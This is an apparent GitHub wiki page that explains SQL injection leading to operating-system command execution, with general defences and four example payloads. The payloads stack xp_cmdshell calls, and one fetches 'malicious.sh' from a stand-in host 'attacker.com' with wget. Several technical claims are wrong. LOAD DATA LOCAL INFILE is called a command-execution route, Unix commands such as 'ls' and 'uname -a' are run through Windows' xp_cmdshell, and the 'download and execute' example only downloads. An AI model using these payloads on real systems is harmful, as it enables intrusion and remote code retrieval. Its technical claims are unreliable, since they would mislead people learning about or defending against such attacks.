info ‐ SQL Injection with Command Execution - taylorjohn/hacking GitHub Wiki

SQL Injection with Command Execution

SQL injection with command execution is a type of security vulnerability that allows attackers to execute arbitrary commands on a database server by exploiting SQL injection vulnerabilities. This technique combines traditional SQL injection with additional commands to achieve command execution on the underlying operating system. SQL injection with command execution can have severe consequences, including unauthorized access to sensitive data and complete compromise of the affected system.

Description

SQL injection with command execution occurs when an attacker is able to inject malicious SQL queries into an application's input fields or parameters. By crafting malicious SQL queries that include additional commands, attackers can execute arbitrary commands on the underlying operating system. This technique is particularly dangerous when the database server has the ability to execute system commands, such as in the case of MySQL's LOAD DATA LOCAL INFILE or MSSQL's xp_cmdshell stored procedures.

How to Inject

Attackers inject malicious SQL queries with command execution capabilities using techniques similar to traditional SQL injection. Common injection techniques include:

  • Union-Based Injection: Attackers inject additional SELECT statements with UNION clauses to append arbitrary commands to the original SQL query.

  • Boolean-Based Injection: Attackers exploit boolean-based blind SQL injection vulnerabilities to execute commands conditionally based on the result of the injected query.

  • Out-of-Band (OOB) Injection: Attackers leverage out-of-band channels, such as DNS or HTTP requests, to execute commands and retrieve results without relying on traditional SQL query responses.

How to Protect

Protecting against SQL injection with command execution vulnerabilities requires a combination of secure coding practices and robust security measures. Key protective measures include:

  • Input Validation and Sanitization: Validate and sanitize all user-supplied input to prevent malicious SQL queries from being executed.

  • Parameterized Queries: Use parameterized queries or prepared statements to interact with the database, rather than concatenating user input into SQL queries.

  • Least Privilege: Limit the privileges of database users to only those necessary for their intended functions. Avoid granting unnecessary permissions that could be exploited by attackers.

  • Firewalling and WAFs: Implement web application firewalls (WAFs) and network firewalls to filter and block malicious SQL injection attempts.

Examples of SQL Injection with Command Execution

  1. List Files in Directory:

    • Description: Executes the ls command to list files in the current directory.
    • SQL Injection: 1'; SELECT * FROM users; EXEC xp_cmdshell('ls'); --

  2. Download and Execute Malicious Script:

    • Description: Downloads and executes a malicious script from a remote server.
    • SQL Injection: 1'; SELECT * FROM users; EXEC xp_cmdshell('wget http://attacker.com/malicious.sh'); --

  3. Display Current User:

    • Description: Retrieves the username of the current user.
    • SQL Injection: 1'; SELECT * FROM users; EXEC xp_cmdshell('whoami'); --

  4. Display System Information:

    • Description: Displays information about the underlying operating system.
    • SQL Injection: 1'; SELECT * FROM users; EXEC xp_cmdshell('uname -a'); --

By understanding the risks associated with SQL injection with command execution and implementing robust security measures, developers can mitigate the risk of exploitation and protect their applications from unauthorized command execution.